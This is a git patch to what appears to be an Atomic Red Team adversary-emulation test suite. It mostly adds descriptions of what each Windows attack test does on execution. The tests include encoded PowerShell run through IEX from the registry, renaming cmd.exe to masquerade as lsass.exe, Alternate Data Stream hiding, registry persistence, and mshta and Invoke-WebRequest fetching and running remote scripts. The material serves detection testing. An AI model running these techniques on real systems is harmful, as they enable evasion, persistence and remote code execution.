From 1f74427802d8fb6a36f0d41f093e019f97e46261 Mon Sep 17 00:00:00 2001
From: Andrew Beers <apbeers@icloud.com>
Date: Thu, 19 Mar 2020 12:17:08 -0700
Subject: [PATCH] Add completion description and fixes 2nd batch (#894)

* Add completion description and fixed

* fix spelling

* wording update

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1027/T1027.yaml |  5 ++---
 atomics/T1036/T1036.yaml | 10 ++++------
 atomics/T1096/T1096.yaml |  4 ++--
 atomics/T1112/T1112.yaml |  4 ++--
 atomics/T1170/T1170.yaml |  9 +++++----
 atomics/T1202/T1202.yaml | 18 +++++-------------
 6 files changed, 20 insertions(+), 30 deletions(-)

diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml
index 4a4bb0a6..7bd7e3ac 100644
--- a/atomics/T1027/T1027.yaml
+++ b/atomics/T1027/T1027.yaml
@@ -23,7 +23,7 @@ atomic_tests:
 - name: Execute base64-encoded PowerShell
   description: |
     Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools.
-
+    Upon execution the test will print "Hey, Atomic!" to the PowerShell session
   supported_platforms:
     - windows
   input_arguments:
@@ -39,7 +39,6 @@ atomic_tests:
       $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
       $EncodedCommand =[Convert]::ToBase64String($Bytes)
       $EncodedCommand
-
       powershell.exe -EncodedCommand $EncodedCommand
 
 - name: Execute base64-encoded PowerShell from Windows Registry
@@ -73,4 +72,4 @@ atomic_tests:
       Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
       powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))"
     cleanup_command: |
-      Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage}
\ No newline at end of file
+      Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage}
diff --git a/atomics/T1036/T1036.yaml b/atomics/T1036/T1036.yaml
index c7f0fb5a..c122dbaa 100644
--- a/atomics/T1036/T1036.yaml
+++ b/atomics/T1036/T1036.yaml
@@ -6,7 +6,7 @@ atomic_tests:
 - name: Masquerading as Windows LSASS process
   description: |
     Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.
-
+    Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second timeout cancels the session
   supported_platforms:
     - windows
 
@@ -14,8 +14,8 @@ atomic_tests:
     name: command_prompt
     elevation_required: false
     command: |
-      cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
-      cmd.exe /c %SystemRoot%\Temp\lsass.exe
+      copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
+      %SystemRoot%\Temp\lsass.exe /B
     cleanup_command: |
       del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
 
@@ -36,10 +36,8 @@ atomic_tests:
 - name: Masquerading - cscript.exe running as notepad.exe
   description: |
     Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe.
-
   supported_platforms:
     - windows
-
   executor:
     name: command_prompt
     elevation_required: false
@@ -52,7 +50,7 @@ atomic_tests:
 - name: Masquerading - wscript.exe running as svchost.exe
   description: |
     Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe.
-
+    Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder
   supported_platforms:
     - windows
 
diff --git a/atomics/T1096/T1096.yaml b/atomics/T1096/T1096.yaml
index 749c335c..58490ed0 100644
--- a/atomics/T1096/T1096.yaml
+++ b/atomics/T1096/T1096.yaml
@@ -38,7 +38,7 @@ atomic_tests:
 - name: Store file in Alternate Data Stream (ADS)
   description: |
     Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.
-
+    Upon execution cmd will run and attempt to launch desktop.ini. No windows remain open after the test
   supported_platforms:
     - windows
 
@@ -66,4 +66,4 @@ atomic_tests:
           }
       Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`""
     cleanup_command: |
-      Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
\ No newline at end of file
+      Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml
index 8fc126b6..30ca09e3 100644
--- a/atomics/T1112/T1112.yaml
+++ b/atomics/T1112/T1112.yaml
@@ -159,7 +159,7 @@ atomic_tests:
 
 - name: Javascript in registry
   description: |
-    placing javascript in registry for persistence
+    Upon execution, a javascript block will be placed in the registry for persistence
   supported_platforms:
     - windows
   executor:
@@ -168,4 +168,4 @@ atomic_tests:
     command: |
       New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "<script>"
     cleanup_command: |
-      Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -ErrorAction Ignore
\ No newline at end of file
+      Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -ErrorAction Ignore
diff --git a/atomics/T1170/T1170.yaml b/atomics/T1170/T1170.yaml
index 6790ae56..ca2d3c74 100644
--- a/atomics/T1170/T1170.yaml
+++ b/atomics/T1170/T1170.yaml
@@ -6,6 +6,7 @@ atomic_tests:
 - name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
   description: |
     Test execution of a remote script using mshta.exe
+    Upon execution calc.exe will be launched
   supported_platforms:
     - windows
   input_arguments:
@@ -17,7 +18,7 @@ atomic_tests:
     name: command_prompt
     elevation_required: false
     command: |
-      mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();      
+      mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
 
 - name: Mshta calls a local VBScript file to launch notepad.exe
   description: Tests execution of a local program by a VBScript file called by Mshta
@@ -26,7 +27,7 @@ atomic_tests:
     - windows
 
   input_arguments:
-    local_file_path: 
+    local_file_path:
       description: Create a local VBScript file
       type: path
       default: C:\Temp\mshta_notepad.vbs
@@ -51,7 +52,7 @@ atomic_tests:
 - name: Mshta Executes Remote HTML Application (HTA)
   description: |
     Execute an arbitrary remote HTA.
-
+    Upon execution calc.exe will be launched
   supported_platforms:
     - windows
   input_arguments:
@@ -69,5 +70,5 @@ atomic_tests:
       $var =Invoke-WebRequest "#{hta_url}"
       $var.content|out-file "#{temp_file}"
       mshta "#{temp_file}"
-    cleanup_command: |  
+    cleanup_command: |
       remove-item "#{temp_file}" -ErrorAction Ignore
diff --git a/atomics/T1202/T1202.yaml b/atomics/T1202/T1202.yaml
index 8e510b4c..2fc004f1 100644
--- a/atomics/T1202/T1202.yaml
+++ b/atomics/T1202/T1202.yaml
@@ -6,12 +6,10 @@ atomic_tests:
 - name: Indirect Command Execution - pcalua.exe
   description: |
     The Program Compatibility Assistant (pcalua.exe) may invoke the execution of programs and commands from a Command-Line Interface.
-
     [Reference](https://twitter.com/KyleHanslovan/status/912659279806640128)
-
+    Upon execution, calc.exe should open
   supported_platforms:
     - windows
-
   input_arguments:
     process:
       description: Process to execute
@@ -20,30 +18,23 @@ atomic_tests:
     payload_path:
       description: Path to payload
       type: path
-      default: c:\temp\payload.dll
-    payload_cpl_path:
-      description: Path to payload
-      type: path
-      default: C:\Windows\system32\javacpl.cpl -c Java
+      default: C:\Windows\System32\calc.exe
 
   executor:
     name: command_prompt
+    elevation_required: false
     command: |
       pcalua.exe -a #{process}
       pcalua.exe -a #{payload_path}
-      pcalua.exe -a #{payload_cpl_path}
 
 - name: Indirect Command Execution - forfiles.exe
   description: |
     forfiles.exe may invoke the execution of programs and commands from a Command-Line Interface.
-
     [Reference](https://github.com/api0cradle/LOLBAS/blob/master/OSBinaries/Forfiles.md)
-
     "This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe"
-
+    Upon execution calc.exe will be opened
   supported_platforms:
     - windows
-
   input_arguments:
     process:
       description: Process to execute
@@ -52,6 +43,7 @@ atomic_tests:
 
   executor:
     name: command_prompt
+    elevation_required: false
     command: |
       forfiles /p c:\windows\system32 /m notepad.exe /c #{process}
       forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"